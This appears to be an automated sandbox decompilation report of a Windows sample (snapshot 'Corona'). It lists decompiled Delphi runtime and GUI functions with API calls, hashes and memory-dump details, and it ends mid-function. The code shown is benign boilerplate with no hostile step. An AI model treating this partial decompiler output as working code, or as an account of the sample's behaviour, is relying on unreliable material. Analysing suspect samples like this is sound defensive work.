                                  • Instruction ID: 4ad74bcecd084e75270380c8ad4262c5f75faf3744fa78d4ad26d46307667cb5
                                  • Opcode Fuzzy Hash: 1fc2afac5e52ccdc58abee8b739a76f62d9f5c348bbc83186e4914bfd283a1f8
                                  • Instruction Fuzzy Hash: 85111FB6100214BFDB00DF99DD84EAA37E8EB08355F104626BD18EB2A6D735E9508B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0041DDB4(struct HDC__* __eax, signed int __ecx) {
                                  				char _v1036;
                                  				signed int _v1038;
                                  				struct tagRGBQUAD _v1048;
                                  				short _v1066;
                                  				short* _t15;
                                  				void* _t18;
                                  				struct HDC__* _t23;
                                  				void* _t26;
                                  				short* _t31;
                                  				short* _t32;
                                  
                                  				_t31 = 0;
                                  				 *_t32 = 0x300;
                                  				if(__eax == 0) {
                                  					_v1038 = __ecx;
                                  					E004028B8(_t26, __ecx << 2,  &_v1036);
                                  				} else {
                                  					_push(0);
                                  					L0040603C();
                                  					_t23 = __eax;
                                  					_t18 = SelectObject(__eax, __eax);
                                  					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                  					SelectObject(_t23, _t18);
                                  					DeleteDC(_t23);
                                  				}
                                  				if(_v1038 != 0) {
                                  					if(_v1038 != 0x10 || E0041DD1C(_t32) == 0) {
                                  						E0041DBAC( &_v1036, _v1038 & 0x0000ffff);
                                  					}
                                  					_t15 = _t32;
                                  					_push(_t15);
                                  					L00406064();
                                  					_t31 = _t15;
                                  				}
                                  				return _t31;
                                  			}














                                  APIs
                                  • 72E7A590.GDI32(00000000,00000000,?,?,00421967,?,?,?,?,00420553,00000000,004205DF), ref: 0041DDCD
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041DDD6
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00421967,?,?,?,?,00420553), ref: 0041DDEA
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041DDF6
                                  • DeleteDC.GDI32(00000000), ref: 0041DDFC
                                  • 72E7A8F0.GDI32(?,00000000,?,?,00421967,?,?,?,?,00420553,00000000,004205DF), ref: 0041DE42
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$A590ColorDeleteTable
                                  • String ID:
                                  • API String ID: 1056449717-0
                                  • Opcode ID: f992d6c6bc59729f5a2660d779ae015ce8fe77aa21328a5181f99c61690b67c6
                                  • Instruction ID: 9cfb4d766d4d1ed9fdfc398e0b59d838b5d01a464858c76b33e8982fc98dbb18
                                  • Opcode Fuzzy Hash: f992d6c6bc59729f5a2660d779ae015ce8fe77aa21328a5181f99c61690b67c6
                                  • Instruction Fuzzy Hash: 2F019BB160431061E610B72A8C47AAB72F88FC0715F01C92FB589AB2C2E67D8845836E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041D498(void* __eax) {
                                  				void* _t36;
                                  
                                  				_t36 = __eax;
                                  				UnrealizeObject(E0041CC2C( *((intOrPtr*)(__eax + 0x14))));
                                  				SelectObject( *(_t36 + 4), E0041CC2C( *((intOrPtr*)(_t36 + 0x14))));
                                  				if(E0041CD0C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                  					SetBkColor( *(_t36 + 4),  !(E0041BF6C(E0041CBF0( *((intOrPtr*)(_t36 + 0x14))))));
                                  					return SetBkMode( *(_t36 + 4), 1);
                                  				} else {
                                  					SetBkColor( *(_t36 + 4), E0041BF6C(E0041CBF0( *((intOrPtr*)(_t36 + 0x14)))));
                                  					return SetBkMode( *(_t36 + 4), 2);
                                  				}
                                  			}





                                  APIs
                                    • Part of subcall function 0041CC2C: CreateBrushIndirect.GDI32(?), ref: 0041CCD6
                                  • UnrealizeObject.GDI32(00000000), ref: 0041D4A4
                                  • SelectObject.GDI32(?,00000000), ref: 0041D4B6
                                  • SetBkColor.GDI32(?,00000000), ref: 0041D4D9
                                  • SetBkMode.GDI32(?,00000002), ref: 0041D4E4
                                  • SetBkColor.GDI32(?,00000000), ref: 0041D4FF
                                  • SetBkMode.GDI32(?,00000001), ref: 0041D50A
                                    • Part of subcall function 0041BF6C: GetSysColor.USER32(?), ref: 0041BF76
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                  • String ID:
                                  • API String ID: 3527656728-0
                                  • Opcode ID: e0b1492e885012949cb2e2ca8e3c8bbe24ed9413439b0ae5a9611b3848af67fb
                                  • Instruction ID: db26740a08f61d6a1bf2e46ee5bbf816a71ff31406259d8a1beaac8910231981
                                  • Opcode Fuzzy Hash: e0b1492e885012949cb2e2ca8e3c8bbe24ed9413439b0ae5a9611b3848af67fb
                                  • Instruction Fuzzy Hash: 9EF0BFB16401009BDF00FFBADDC7A4777989F083097004456B905DF197C67DE8518739
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405A9D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                  				long _t11;
                                  				void* _t16;
                                  
                                  				_t16 = __ebx;
                                  				 *__edi =  *__edi + __ecx;
                                  				 *((intOrPtr*)(__eax - 0x4525b8)) =  *((intOrPtr*)(__eax - 0x4525b8)) + __eax - 0x4525b8;
                                  				 *0x450008 = 2;
                                  				 *0x452014 = 0x4011fc;
                                  				 *0x452018 = 0x401204;
                                  				 *0x45204a = 2;
                                  				 *0x452000 = E00404C18;
                                  				if(E00402F44() != 0) {
                                  					_t3 = E00402F74();
                                  				}
                                  				E00403038(_t3);
                                  				 *0x452050 = 0xd7b0;
                                  				 *0x45221c = 0xd7b0;
                                  				 *0x4523e8 = 0xd7b0;
                                  				 *0x45203c = GetCommandLineA();
                                  				 *0x452038 = E0040130C();
                                  				if((GetVersion() & 0x80000000) == 0x80000000) {
                                  					 *0x4525bc = E004059D4(GetThreadLocale(), _t16, __eflags);
                                  				} else {
                                  					if((GetVersion() & 0x000000ff) <= 4) {
                                  						 *0x4525bc = E004059D4(GetThreadLocale(), _t16, __eflags);
                                  					} else {
                                  						 *0x4525bc = 3;
                                  					}
                                  				}
                                  				_t11 = GetCurrentThreadId();
                                  				 *0x452030 = _t11;
                                  				return _t11;
                                  			}






                                  APIs
                                    • Part of subcall function 00402F44: GetKeyboardType.USER32(00000000), ref: 00402F49
                                    • Part of subcall function 00402F44: GetKeyboardType.USER32(00000001), ref: 00402F55
                                  • GetCommandLineA.KERNEL32 ref: 00405B03
                                  • GetVersion.KERNEL32 ref: 00405B17
                                  • GetVersion.KERNEL32 ref: 00405B28
                                  • GetCurrentThreadId.KERNEL32 ref: 00405B64
                                    • Part of subcall function 00402F74: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F96
                                    • Part of subcall function 00402F74: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FC9
                                    • Part of subcall function 00402F74: RegCloseKey.ADVAPI32(?,00402FEC,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FDF
                                  • GetThreadLocale.KERNEL32 ref: 00405B44
                                    • Part of subcall function 004059D4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405A3A), ref: 004059FA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID:
                                  • API String ID: 3734044017-0
                                  • Opcode ID: b3fbfd6a88ff54c3af26434b01ebe3ae0079439209388d3db7d043bac674a12c
                                  • Instruction ID: 48a128f339e3af2d8d715bf7417d2a7053d639c943ef1a06fe3e216bf9e22b1a
                                  • Opcode Fuzzy Hash: b3fbfd6a88ff54c3af26434b01ebe3ae0079439209388d3db7d043bac674a12c
                                  • Instruction Fuzzy Hash: 760161A580574299EB10BF72AA553563A60AB1330AF10407FD640BA2F3E7FC9145DF6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040B5CC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				struct _MEMORY_BASIC_INFORMATION _v36;
                                  				char _v297;
                                  				char _v304;
                                  				intOrPtr _v308;
                                  				char _v312;
                                  				char _v316;
                                  				char _v320;
                                  				intOrPtr _v324;
                                  				char _v328;
                                  				void* _v332;
                                  				char _v336;
                                  				char _v340;
                                  				char _v344;
                                  				char _v348;
                                  				intOrPtr _v352;
                                  				char _v356;
                                  				char _v360;
                                  				char _v364;
                                  				void* _v368;
                                  				char _v372;
                                  				intOrPtr _t52;
                                  				intOrPtr _t60;
                                  				intOrPtr _t82;
                                  				intOrPtr _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t101;
                                  				void* _t108;
                                  				intOrPtr _t110;
                                  				void* _t113;
                                  
                                  				_t108 = __edi;
                                  				_v372 = 0;
                                  				_v336 = 0;
                                  				_v344 = 0;
                                  				_v340 = 0;
                                  				_v8 = 0;
                                  				_push(_t113);
                                  				_push(0x40b787);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t113 + 0xfffffe90;
                                  				_t89 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                  					_t52 =  *0x450fd0; // 0x406aa4
                                  					E0040597C(_t52,  &_v8);
                                  				} else {
                                  					_t86 =  *0x451130; // 0x406a9c
                                  					E0040597C(_t86,  &_v8);
                                  				}
                                  				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                  				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                  				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                  					_v368 =  *(_t89 + 0xc);
                                  					_v364 = 5;
                                  					_v360 = _v8;
                                  					_v356 = 0xb;
                                  					_v352 = _t110;
                                  					_v348 = 5;
                                  					_t60 =  *0x450fdc; // 0x406a4c
                                  					E0040597C(_t60,  &_v372);
                                  					E0040B1F4(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                  				} else {
                                  					_v332 =  *(_t89 + 0xc);
                                  					_v328 = 5;
                                  					E004040BC( &_v340, 0x105,  &_v297);
                                  					E00408140(_v340,  &_v336);
                                  					_v324 = _v336;
                                  					_v320 = 0xb;
                                  					_v316 = _v8;
                                  					_v312 = 0xb;
                                  					_v308 = _t110;
                                  					_v304 = 5;
                                  					_t82 =  *0x45103c; // 0x406b44
                                  					E0040597C(_t82,  &_v344);
                                  					E0040B1F4(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                  				}
                                  				_pop(_t101);
                                  				 *[fs:eax] = _t101;
                                  				_push(E0040B78E);
                                  				E00403E4C( &_v372);
                                  				E00403E70( &_v344, 3);
                                  				return E00403E4C( &_v8);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040B787), ref: 0040B637
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040B787), ref: 0040B659
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: Dk@$Lj@$ps@
                                  • API String ID: 902310565-4243004233
                                  • Opcode ID: bd1403319e8bfbc1db224c7305b3ba40fb4844939c798b0a1795ddff716335bf
                                  • Instruction ID: 49e01914331b003dba712245535bc4eaaf39a7e01c166723ba37cb5f8d7efa30
                                  • Opcode Fuzzy Hash: bd1403319e8bfbc1db224c7305b3ba40fb4844939c798b0a1795ddff716335bf
                                  • Instruction Fuzzy Hash: 29410870900658DFDB60DF69CC81BDAB7F4EB48304F4040EAE908AB291D7789E84CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AF68(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v273;
                                  				char _v534;
                                  				char _v790;
                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                  				char _v824;
                                  				intOrPtr _v828;
                                  				char _v832;
                                  				intOrPtr _v836;
                                  				char _v840;
                                  				intOrPtr _v844;
                                  				char _v848;
                                  				char* _v852;
                                  				char _v856;
                                  				char _v860;
                                  				char _v1116;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t40;
                                  				intOrPtr _t51;
                                  				struct HINSTANCE__* _t53;
                                  				void* _t69;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  				intOrPtr _t83;
                                  				intOrPtr _t86;
                                  				intOrPtr* _t87;
                                  				void* _t93;
                                  
                                  				_t93 = __fp0;
                                  				_v8 = __ecx;
                                  				_t73 = __edx;
                                  				_t87 = __eax;
                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                  					_t40 =  *0x452664; // 0x400000
                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                  					_v12 = E0040AF5C(_t73);
                                  				} else {
                                  					_v12 = _t73 - _v820.AllocationBase;
                                  				}
                                  				E004082D4( &_v273, 0x104, E0040BF80(0x5c) + 1);
                                  				_t74 = 0x40b0e8;
                                  				_t86 = 0x40b0e8;
                                  				_t83 =  *0x406cc4; // 0x406d10
                                  				if(E00403288(_t87, _t83) != 0) {
                                  					_t74 = E0040430C( *((intOrPtr*)(_t87 + 4)));
                                  					_t69 = E00408270(_t74, 0x40b0e8);
                                  					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                  						_t86 = 0x40b0ec;
                                  					}
                                  				}
                                  				_t51 =  *0x4510f4; // 0x406a74
                                  				_t16 = _t51 + 4; // 0xffe8
                                  				_t53 =  *0x452664; // 0x400000
                                  				LoadStringA(E00404EE8(_t53),  *_t16,  &_v790, 0x100);
                                  				E0040304C( *_t87,  &_v1116);
                                  				_v860 =  &_v1116;
                                  				_v856 = 4;
                                  				_v852 =  &_v273;
                                  				_v848 = 6;
                                  				_v844 = _v12;
                                  				_v840 = 5;
                                  				_v836 = _t74;
                                  				_v832 = 6;
                                  				_v828 = _t86;
                                  				_v824 = 6;
                                  				E004088F8(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                  				return E00408270(_v8, _t86);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AF85
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AFA9
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AFC4
                                  • LoadStringA.USER32 ref: 0040B05A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: tj@
                                  • API String ID: 3990497365-1165482787
                                  • Opcode ID: b091abca5cb63712d51e5744eb9559b473fa3e6cd5b0578424242ea3974542d5
                                  • Instruction ID: 2a6a6bb71484bad2caa5c58cb7ab985c6530a2227addd48874c4b6061fea0095
                                  • Opcode Fuzzy Hash: b091abca5cb63712d51e5744eb9559b473fa3e6cd5b0578424242ea3974542d5
                                  • Instruction Fuzzy Hash: 30412070A003589BDB21DB69CD85BDAB7BC9B08305F4040FAE548F7292D7789F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AF66(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v273;
                                  				char _v534;
                                  				char _v790;
                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                  				char _v824;
                                  				intOrPtr _v828;
                                  				char _v832;
                                  				intOrPtr _v836;
                                  				char _v840;
                                  				intOrPtr _v844;
                                  				char _v848;
                                  				char* _v852;
                                  				char _v856;
                                  				char _v860;
                                  				char _v1116;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t40;
                                  				intOrPtr _t51;
                                  				struct HINSTANCE__* _t53;
                                  				void* _t69;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  				intOrPtr _t85;
                                  				intOrPtr _t89;
                                  				intOrPtr* _t92;
                                  				void* _t105;
                                  
                                  				_v8 = __ecx;
                                  				_t74 = __edx;
                                  				_t92 = __eax;
                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                  					_t40 =  *0x452664; // 0x400000
                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                  					_v12 = E0040AF5C(_t74);
                                  				} else {
                                  					_v12 = _t74 - _v820.AllocationBase;
                                  				}
                                  				E004082D4( &_v273, 0x104, E0040BF80(0x5c) + 1);
                                  				_t75 = 0x40b0e8;
                                  				_t89 = 0x40b0e8;
                                  				_t85 =  *0x406cc4; // 0x406d10
                                  				if(E00403288(_t92, _t85) != 0) {
                                  					_t75 = E0040430C( *((intOrPtr*)(_t92 + 4)));
                                  					_t69 = E00408270(_t75, 0x40b0e8);
                                  					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                  						_t89 = 0x40b0ec;
                                  					}
                                  				}
                                  				_t51 =  *0x4510f4; // 0x406a74
                                  				_t16 = _t51 + 4; // 0xffe8
                                  				_t53 =  *0x452664; // 0x400000
                                  				LoadStringA(E00404EE8(_t53),  *_t16,  &_v790, 0x100);
                                  				E0040304C( *_t92,  &_v1116);
                                  				_v860 =  &_v1116;
                                  				_v856 = 4;
                                  				_v852 =  &_v273;
                                  				_v848 = 6;
                                  				_v844 = _v12;
                                  				_v840 = 5;
                                  				_v836 = _t75;
                                  				_v832 = 6;
                                  				_v828 = _t89;
                                  				_v824 = 6;
                                  				E004088F8(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                  				return E00408270(_v8, _t89);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AF85
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AFA9
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AFC4
                                  • LoadStringA.USER32 ref: 0040B05A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: tj@
                                  • API String ID: 3990497365-1165482787
                                  • Opcode ID: 25e1ce31c232b2c391fb264439be15b96259eb47e4e9e1fd0a8f35ddb661912e
                                  • Instruction ID: 14794c9657d7e157509dfb227f0053361b409bfa3ba5a1be76eb5f9c0a6d41bd
                                  • Opcode Fuzzy Hash: 25e1ce31c232b2c391fb264439be15b96259eb47e4e9e1fd0a8f35ddb661912e
                                  • Instruction Fuzzy Hash: A1411F70A003589BDB21DB69CD85BDAB7BC9B08305F4440FAA548F7292DB789F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0044190C(intOrPtr* __eax) {
                                  				struct tagMENUITEMINFOA _v128;
                                  				intOrPtr _v132;
                                  				int _t16;
                                  				intOrPtr* _t29;
                                  				struct HMENU__* _t36;
                                  				MENUITEMINFOA* _t37;
                                  
                                  				_t37 =  &_v128;
                                  				_t29 = __eax;
                                  				_t16 =  *0x45112c; // 0x452740
                                  				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                  					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                  					_t37->cbSize = 0x2c;
                                  					_v132 = 0x10;
                                  					_v128.hbmpUnchecked =  &(_v128.cch);
                                  					_v128.dwItemData = 0x50;
                                  					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  					if(_t16 != 0) {
                                  						_t16 = E00441C90(_t29);
                                  						asm("sbb edx, edx");
                                  						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                  							_v128.cbSize = ((E00441C90(_t29) & 0x0000007f) << 0x0000000d) + ((E00441C90(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                  							_v132 = 0x10;
                                  							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  							if(_t16 != 0) {
                                  								return DrawMenuBar( *(_t29 + 0x38));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}

                                  APIs
                                  • GetMenuItemInfoA.USER32 ref: 0044195A
                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004419AC
                                  • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004419B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: @'E$P
                                  • API String ID: 3227129158-1340524458
                                  • Opcode ID: 19148a3e3cff468209702d2579602675a742050a8348269eeda0cab944079672
                                  • Instruction ID: 3ddb2fd4f838cd13f267d1ccc0321f192132310a35351720ce2d8d6c73b89ee1
                                  • Opcode Fuzzy Hash: 19148a3e3cff468209702d2579602675a742050a8348269eeda0cab944079672
                                  • Instruction Fuzzy Hash: 111182703052015FE3109F29CC85B5B76D8AB85355F148669F0A4DB3EAD779C894C789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00402F74() {
                                  				void* _v8;
                                  				char _v12;
                                  				int _v16;
                                  				signed short _t12;
                                  				signed short _t14;
                                  				intOrPtr _t27;
                                  				void* _t29;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  
                                  				_t29 = _t31;
                                  				_t32 = _t31 + 0xfffffff4;
                                  				_v12 =  *0x450020 & 0x0000ffff;
                                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                  					_t12 =  *0x450020; // 0x1372
                                  					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                  					 *0x450020 = _t14;
                                  					return _t14;
                                  				} else {
                                  					_push(_t29);
                                  					_push(E00402FE5);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t32;
                                  					_v16 = 4;
                                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                  					_pop(_t27);
                                  					 *[fs:eax] = _t27;
                                  					_push(0x402fec);
                                  					return RegCloseKey(_v8);
                                  				}
                                  			}

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F96
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FC9
                                  • RegCloseKey.ADVAPI32(?,00402FEC,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 8cdc6f3d9ce9be6ccd775c9ddf3624abd7275d465d7f04bf4c3c3197e80d43ec
                                  • Instruction ID: 79a8500c38d6b94a54a844a0eed5da9113a6d7aeac67bba0153ab5a8a25ccdab
                                  • Opcode Fuzzy Hash: 8cdc6f3d9ce9be6ccd775c9ddf3624abd7275d465d7f04bf4c3c3197e80d43ec
                                  • Instruction Fuzzy Hash: 8E017579A40309BADB11DB90DD42FAE77BCEB08B05F5001B7B900F65D1E6799A10D75C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0043E6BC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				struct tagRECT _v32;
                                  				void* _t53;
                                  				int _t63;
                                  				CHAR* _t65;
                                  				void* _t76;
                                  				void* _t78;
                                  				int _t89;
                                  				CHAR* _t91;
                                  				int _t117;
                                  				intOrPtr _t127;
                                  				void* _t139;
                                  				void* _t144;
                                  				char _t153;
                                  
